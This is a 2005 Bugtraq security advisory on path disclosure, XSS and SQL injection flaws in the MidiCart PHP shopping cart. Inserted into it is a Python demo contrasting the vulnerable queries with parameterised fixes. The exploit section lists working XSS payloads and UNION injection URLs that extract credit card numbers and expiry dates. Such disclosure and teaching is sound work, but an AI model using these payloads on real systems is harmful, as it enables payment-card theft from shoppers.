List: bugtraq
Subject: [hackgen-2005-#004] - Multiple bugs in MidiCart PHP Shopping Cart
From: Exoduks <exoduks () gmail ! com>
Date: 2005-05-05 17:01:34
Message-ID: 20050505170134.18885.qmail () www ! securityfocus ! com
http://www.hackgen.org/advisories/hackgen-2005-004.txt
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' [hackgen-2005-#004] '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Multiple bugs in MidiCart PHP Shopping Cart '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Software: MidiCart PHP Shopping Cart
Homepage: http://www.midicart.com/
Author: "Exoduks" - HackGen Team
Release Date: 5 May, 2005
Website: www.hackgen.org
Mail: exoduks [at] gmail . com
0x01 - Affected software description:
-------------------------------------
MidiCart is try-before-you-buy shopping cart software that provides all you need to create, operate, and maintain a professional Internet shop. MidiCart ASP and PHP Shopping Cart is an extremely easy to use, flexible, powerful and affordable e-commerce solution for your web site.
0x02 - Vulnerability Description:
---------------------------------
There are several vulnerabilities in MidiCart. First, several scripts reference undefined variables; if php.ini has display_errors = On, the resulting PHP notices reveal the full filesystem path of the script. Second, item_list.php and search_list.php echo their GET parameters without any input checking, so script code can be injected and executed in the visitor's browser (XSS). Third, search_list.php, item_list.php and item_show.php pass unfiltered input straight into MySQL queries, so a specially crafted value is executed as part of the SQL command and can be used to read sensitive information from the database.
0x03 - Vulnerability Code:
--------------------------
Code vulnerable to SQL injection in search_list.php ($chose and $searchstring come straight from the request, unfiltered):
...
// database query to select the categories
$result = mysql_query("select * from products WHERE $chose LIKE '%$searchstring%' ORDER BY 'maingroup','secondgroup','code_no' LIMIT 0, 100 ") ;
...
Code vulnerable to SQL injection in item_show.php ($code_no comes straight from the request, unfiltered):
// query to get the products of type $category
$result = mysql_query("select * from products where(code_no = '$code_no') ORDER BY 'item'");
0x04 - How to fix this bug:
---------------------------
The vendor has been contacted and will probably publish a new version of this shopping cart; go to http://www.midicart.com/ and look for a new version.
0x05 - Exploit:
----------------
Full-path disclosure !
-----------------------
http://site.com/shop/search_list.php
http://site.com/shop/item_list.php
http://site.com/shop/item_show.php
XSS !
------
http://site.com/shop/search_list.php?chose=item&searchstring=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
http://site.com/shop/item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
http://site.com/shop/item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
SQL injection !
----------------
http://site.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment /*
http://site.com/shop/item_list.php?maingroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment /*
http://site.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment /*
http://site.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment /*
* The SQL injection requests work only with magic_quotes_gpc set to Off in php.ini (with it On, the single quotes in the payloads are backslash-escaped before they reach the query).
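As an added illustration (not code from this advisory or from MidiCart), the following Python script rebuilds the two vulnerable queries from section 0x03 against an in-memory SQLite database and runs UNION payloads of the same shape as the requests above, next to a fixed version that checks the column name against a whitelist and binds the search value as a parameter. Everything in it is constructed for the example: the products and card_payment tables, their four-column layout (the real products table has 28 columns, judging by the null padding in the requests above, so the payloads here use 4 columns instead of 28) and the card rows. SQLite stands in for MySQL; the trailing /* comments out the ORDER BY and LIMIT clauses exactly as it does in the real requests.

```python
import sqlite3

# Constructed sample data for a toy shop; the card numbers are test values, not real cards.
PRODUCTS = [
    ("A100", "Red Widget", "widgets", "small"),
    ("A200", "Blue Gadget", "gadgets", "large"),
]
CARDS = [
    ("4111111111111111", "12/09"),
    ("5500000000000004", "06/10"),
]

# The only column names search_list.php should ever accept in $chose (assumed set).
ALLOWED_SEARCH_COLUMNS = {"item", "code_no", "maingroup", "secondgroup"}


def make_db():
    """In-memory stand-in for the shop's MySQL database (4-column products table)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (code_no TEXT, item TEXT, maingroup TEXT, secondgroup TEXT)")
    db.execute("CREATE TABLE card_payment (CreditCard TEXT, ExpDate TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?, ?)", PRODUCTS)
    db.executemany("INSERT INTO card_payment VALUES (?, ?)", CARDS)
    return db


def search_list_vulnerable(db, chose, searchstring):
    """Mirrors search_list.php: both request parameters are pasted into the SQL text."""
    sql = (f"select * from products WHERE {chose} LIKE '%{searchstring}%' "
           "ORDER BY 'maingroup','secondgroup','code_no' LIMIT 0, 100")
    return db.execute(sql).fetchall()


def search_list_fixed(db, chose, searchstring):
    """Hardened form: column name whitelisted, search value bound, ORDER BY uses identifiers."""
    if chose not in ALLOWED_SEARCH_COLUMNS:
        raise ValueError("unknown search column")
    sql = (f"select * from products WHERE {chose} LIKE ? "
           "ORDER BY maingroup, secondgroup, code_no LIMIT 100")
    return db.execute(sql, (f"%{searchstring}%",)).fetchall()


def item_show_vulnerable(db, code_no):
    """Mirrors item_show.php: code_no lands inside where(code_no = '...')."""
    sql = f"select * from products where(code_no = '{code_no}') ORDER BY 'item'"
    return db.execute(sql).fetchall()


def item_show_fixed(db, code_no):
    """Hardened form: code_no bound as a parameter, so quotes in it stay data."""
    return db.execute("select * from products where code_no = ? ORDER BY item", (code_no,)).fetchall()


# Payloads in the advisory's shape, sized for the 4-column toy table.
# search_list: close the LIKE string with %', append the UNION, comment out the rest.
SEARCH_PAYLOAD = "a%' UNION SELECT null, null, CreditCard, ExpDate FROM card_payment /*"
# item_show: close the quoted value and the parenthesis with '), then the same UNION.
ITEM_PAYLOAD = "99 ') UNION SELECT null, null, CreditCard, ExpDate FROM card_payment /*"


def leaked_cards(rows):
    """Pick out the (CreditCard, ExpDate) pairs the UNION smuggled into the product rows."""
    return sorted((r[2], r[3]) for r in rows if r[0] is None)


def demo():
    """Returns what each variant leaks: (vulnerable search, vulnerable item, fixed search, fixed item)."""
    db = make_db()
    return (
        leaked_cards(search_list_vulnerable(db, "item", SEARCH_PAYLOAD)),
        leaked_cards(item_show_vulnerable(db, ITEM_PAYLOAD)),
        leaked_cards(search_list_fixed(db, "item", SEARCH_PAYLOAD)),
        leaked_cards(item_show_fixed(db, ITEM_PAYLOAD)),
    )


if __name__ == "__main__":
    for label, cards in zip(("vuln search", "vuln item", "fixed search", "fixed item"), demo()):
        print(f"{label}: {cards}")
```

The binding of the value is what stops the injection; the column name cannot be bound, which is why $chose needs a whitelist rather than escaping. In the PHP of the period the equivalent is a whitelist for $chose plus mysql_real_escape_string() (or a prepared statement via mysqli/PDO) for the values, independent of the magic_quotes_gpc setting. Note that the fixed query still lets the user supply % and _ as LIKE wildcards; that is a search feature, not an injection.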
0x06 - The End:
----------------
And we are at the end again. Grejtttzz to blackhat.headcoders.net
______________________________________
Written By Exoduks - www.hackgen.org